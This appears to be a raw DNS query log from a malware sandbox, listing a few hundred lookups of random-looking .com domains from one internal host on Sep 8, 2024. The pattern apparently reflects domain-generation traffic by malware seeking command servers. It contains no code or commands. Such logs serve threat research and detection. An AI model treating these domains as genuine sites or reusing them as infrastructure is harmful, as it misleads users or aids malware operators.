                                                                                                                                                                                                            Sep 8, 2024 09:00:09.093590975 CEST192.168.2.41.1.1.10x68beStandard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.093859911 CEST192.168.2.41.1.1.10x6ccStandard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.094271898 CEST192.168.2.41.1.1.10x1ce3Standard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.094613075 CEST192.168.2.41.1.1.10xe45fStandard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.094957113 CEST192.168.2.41.1.1.10xdd4bStandard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.095516920 CEST192.168.2.41.1.1.10x7b3eStandard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.095736027 CEST192.168.2.41.1.1.10x3fd9Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.095947027 CEST192.168.2.41.1.1.10xd4ebStandard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.096347094 CEST192.168.2.41.1.1.10x2ab1Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.096541882 CEST192.168.2.41.1.1.10xa191Standard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.096942902 CEST192.168.2.41.1.1.10x20c3Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.097093105 CEST192.168.2.41.1.1.10xe480Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.097692966 CEST192.168.2.41.1.1.10x7a96Standard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.097769022 CEST192.168.2.41.1.1.10x8b78Standard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.098402977 CEST192.168.2.41.1.1.10x3d94Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.098475933 CEST192.168.2.41.1.1.10xf7e8Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.099072933 CEST192.168.2.41.1.1.10xa007Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.099159956 CEST192.168.2.41.1.1.10x62b5Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.100205898 CEST192.168.2.41.1.1.10xcf0eStandard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.612221956 CEST192.168.2.41.1.1.10xc06fStandard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.614557028 CEST192.168.2.41.1.1.10x39d9Standard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.618664980 CEST192.168.2.41.1.1.10x2443Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.619045973 CEST192.168.2.41.1.1.10x5df1Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.620086908 CEST192.168.2.41.1.1.10x7c2fStandard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.624883890 CEST192.168.2.41.1.1.10x1578Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.625541925 CEST192.168.2.41.1.1.10x20a7Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.629815102 CEST192.168.2.41.1.1.10x20acStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.631175041 CEST192.168.2.41.1.1.10x2bStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.635111094 CEST192.168.2.41.1.1.10x5381Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.635893106 CEST192.168.2.41.1.1.10x47d9Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.635973930 CEST192.168.2.41.1.1.10x1c7eStandard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.636708975 CEST192.168.2.41.1.1.10xd5f5Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.638416052 CEST192.168.2.41.1.1.10x92a5Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.639072895 CEST192.168.2.41.1.1.10xd611Standard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.639193058 CEST192.168.2.41.1.1.10x2832Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.639780045 CEST192.168.2.41.1.1.10x64a5Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.640134096 CEST192.168.2.41.1.1.10x6ed1Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.640336990 CEST192.168.2.41.1.1.10xd45Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.640671015 CEST192.168.2.41.1.1.10xef30Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.641108990 CEST192.168.2.41.1.1.10x42d1Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.641216993 CEST192.168.2.41.1.1.10x629aStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.641757011 CEST192.168.2.41.1.1.10x297dStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.641869068 CEST192.168.2.41.1.1.10x6a93Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.642355919 CEST192.168.2.41.1.1.10x3a95Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.642445087 CEST192.168.2.41.1.1.10xd9b8Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.642975092 CEST192.168.2.41.1.1.10x19feStandard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.643119097 CEST192.168.2.41.1.1.10x9965Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.643449068 CEST192.168.2.41.1.1.10x41edStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.643682957 CEST192.168.2.41.1.1.10x1c2eStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.644049883 CEST192.168.2.41.1.1.10xa681Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.644468069 CEST192.168.2.41.1.1.10xa4b0Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.645024061 CEST192.168.2.41.1.1.10x388dStandard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.645612955 CEST192.168.2.41.1.1.10x34cStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.650780916 CEST192.168.2.41.1.1.10x4d2aStandard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.651403904 CEST192.168.2.41.1.1.10x770cStandard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.652390957 CEST192.168.2.41.1.1.10x6b45Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.654077053 CEST192.168.2.41.1.1.10x7386Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.656152010 CEST192.168.2.41.1.1.10x75ebStandard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.657995939 CEST192.168.2.41.1.1.10xae71Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.658508062 CEST192.168.2.41.1.1.10xd616Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839267015 CEST192.168.2.41.1.1.10xc7ecStandard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.840255976 CEST192.168.2.41.1.1.10x9f04Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.841470003 CEST192.168.2.41.1.1.10x16daStandard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.842861891 CEST192.168.2.41.1.1.10x1cfbStandard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.844439030 CEST192.168.2.41.1.1.10x2df6Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.845273018 CEST192.168.2.41.1.1.10xd883Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.849493980 CEST192.168.2.41.1.1.10xb5acStandard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.849670887 CEST192.168.2.41.1.1.10xd656Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.849946976 CEST192.168.2.41.1.1.10x7fa0Standard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.850140095 CEST192.168.2.41.1.1.10x8d67Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.851298094 CEST192.168.2.41.1.1.10xd957Standard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.853691101 CEST192.168.2.41.1.1.10x8876Standard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.855077982 CEST192.168.2.41.1.1.10x5d8dStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.855253935 CEST192.168.2.41.1.1.10xe6ddStandard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.855415106 CEST192.168.2.41.1.1.10x195bStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856053114 CEST192.168.2.41.1.1.10x2382Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856523037 CEST192.168.2.41.1.1.10xd62Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856690884 CEST192.168.2.41.1.1.10x7babStandard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856853962 CEST192.168.2.41.1.1.10x54a0Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.866065025 CEST192.168.2.41.1.1.10x1dc7Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.866729021 CEST192.168.2.41.1.1.10x1096Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.868004084 CEST192.168.2.41.1.1.10x478Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.869292021 CEST192.168.2.41.1.1.10x85c1Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.873251915 CEST192.168.2.41.1.1.10x3b1aStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.879596949 CEST192.168.2.41.1.1.10x383aStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.880023956 CEST192.168.2.41.1.1.10xfb2dStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881084919 CEST192.168.2.41.1.1.10x343Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881328106 CEST192.168.2.41.1.1.10xf203Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881691933 CEST192.168.2.41.1.1.10x419bStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881891966 CEST192.168.2.41.1.1.10x7d44Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.882172108 CEST192.168.2.41.1.1.10xdecStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.882776022 CEST192.168.2.41.1.1.10xba79Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.884644032 CEST192.168.2.41.1.1.10x987aStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.886056900 CEST192.168.2.41.1.1.10x5279Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.886893034 CEST192.168.2.41.1.1.10x6f60Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.887728930 CEST192.168.2.41.1.1.10xc81fStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.895889044 CEST192.168.2.41.1.1.10x536cStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.898397923 CEST192.168.2.41.1.1.10xc991Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.902045012 CEST192.168.2.41.1.1.10x34b5Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.902523994 CEST192.168.2.41.1.1.10x73e8Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903369904 CEST192.168.2.41.1.1.10x5475Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903477907 CEST192.168.2.41.1.1.10xec1fStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903703928 CEST192.168.2.41.1.1.10x5a12Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903959036 CEST192.168.2.41.1.1.10x5e04Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.904854059 CEST192.168.2.41.1.1.10xfff5Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.907171011 CEST192.168.2.41.1.1.10x6a64Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908323050 CEST192.168.2.41.1.1.10xc4e6Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908588886 CEST192.168.2.41.1.1.10x9535Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908992052 CEST192.168.2.41.1.1.10x7ecfStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909188986 CEST192.168.2.41.1.1.10x5e67Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909636974 CEST192.168.2.41.1.1.10x951dStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909847975 CEST192.168.2.41.1.1.10x7954Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.910372019 CEST192.168.2.41.1.1.10x5787Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.912704945 CEST192.168.2.41.1.1.10xd1b4Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.925534964 CEST192.168.2.41.1.1.10xad1aStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.925791979 CEST192.168.2.41.1.1.10xdaa4Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926120996 CEST192.168.2.41.1.1.10xd22cStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926599979 CEST192.168.2.41.1.1.10x713dStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926599979 CEST192.168.2.41.1.1.10xcf5cStandard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.933391094 CEST192.168.2.41.1.1.10x1ee9Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.934189081 CEST192.168.2.41.1.1.10xa23fStandard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.934663057 CEST192.168.2.41.1.1.10xb5f8Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.105119944 CEST192.168.2.41.1.1.10x4c21Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.105504990 CEST192.168.2.41.1.1.10xa4adStandard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.113039970 CEST192.168.2.41.1.1.10xb28dStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.113254070 CEST192.168.2.41.1.1.10x7cc8Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.113502979 CEST192.168.2.41.1.1.10x2163Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.116625071 CEST192.168.2.41.1.1.10xcb1aStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.117341042 CEST192.168.2.41.1.1.10xb2ebStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.117683887 CEST192.168.2.41.1.1.10x9017Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.117916107 CEST192.168.2.41.1.1.10x9b3cStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.118216991 CEST192.168.2.41.1.1.10xe0c5Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.118515015 CEST192.168.2.41.1.1.10x8a70Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.125298977 CEST192.168.2.41.1.1.10xf134Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.126565933 CEST192.168.2.41.1.1.10x8cc1Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.138809919 CEST192.168.2.41.1.1.10x22ecStandard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.139141083 CEST192.168.2.41.1.1.10x53c0Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.139429092 CEST192.168.2.41.1.1.10xc208Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.151871920 CEST192.168.2.41.1.1.10xf608Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.152354002 CEST192.168.2.41.1.1.10x8dafStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.204894066 CEST192.168.2.41.1.1.10xe484Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205339909 CEST192.168.2.41.1.1.10x7326Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205554962 CEST192.168.2.41.1.1.10x72adStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.206036091 CEST192.168.2.41.1.1.10xa746Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.206603050 CEST192.168.2.41.1.1.10x8394Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.207977057 CEST192.168.2.41.1.1.10xb27bStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.208316088 CEST192.168.2.41.1.1.10x778aStandard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.229367018 CEST192.168.2.41.1.1.10x8b97Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.483750105 CEST192.168.2.41.1.1.10x4f62Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.709214926 CEST192.168.2.41.1.1.10x4ac3Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.023562908 CEST192.168.2.41.1.1.10xd69aStandard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.024432898 CEST192.168.2.41.1.1.10x1d74Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.026297092 CEST192.168.2.41.1.1.10x5e8fStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.027184963 CEST192.168.2.41.1.1.10x4311Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.028677940 CEST192.168.2.41.1.1.10x6ad0Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.030426025 CEST192.168.2.41.1.1.10xb2e3Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.030793905 CEST192.168.2.41.1.1.10xf2faStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.032049894 CEST192.168.2.41.1.1.10x327aStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.035804987 CEST192.168.2.41.1.1.10x94d4Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.042026043 CEST192.168.2.41.1.1.10xa58cStandard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.053886890 CEST192.168.2.41.1.1.10x917dStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.054094076 CEST192.168.2.41.1.1.10xbdf4Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.054511070 CEST192.168.2.41.1.1.10xf907Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.069462061 CEST192.168.2.41.1.1.10xf83eStandard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.069864035 CEST192.168.2.41.1.1.10xeec3Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.070403099 CEST192.168.2.41.1.1.10x4fcfStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.070631981 CEST192.168.2.41.1.1.10xc13fStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.081679106 CEST192.168.2.41.1.1.10x5f54Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.096385002 CEST192.168.2.41.1.1.10xd7b3Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.096699953 CEST192.168.2.41.1.1.10x3221Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.222464085 CEST192.168.2.41.1.1.10x1faeStandard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.223031998 CEST192.168.2.41.1.1.10xe4b3Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.223238945 CEST192.168.2.41.1.1.10x53feStandard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.223814011 CEST192.168.2.41.1.1.10x7a86Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.224555969 CEST192.168.2.41.1.1.10x18d5Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.224862099 CEST192.168.2.41.1.1.10xe520Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.225214958 CEST192.168.2.41.1.1.10xfd79Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.225755930 CEST192.168.2.41.1.1.10x483eStandard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.225935936 CEST192.168.2.41.1.1.10xf918Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.226094007 CEST192.168.2.41.1.1.10x87f7Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.226252079 CEST192.168.2.41.1.1.10xf5c3Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
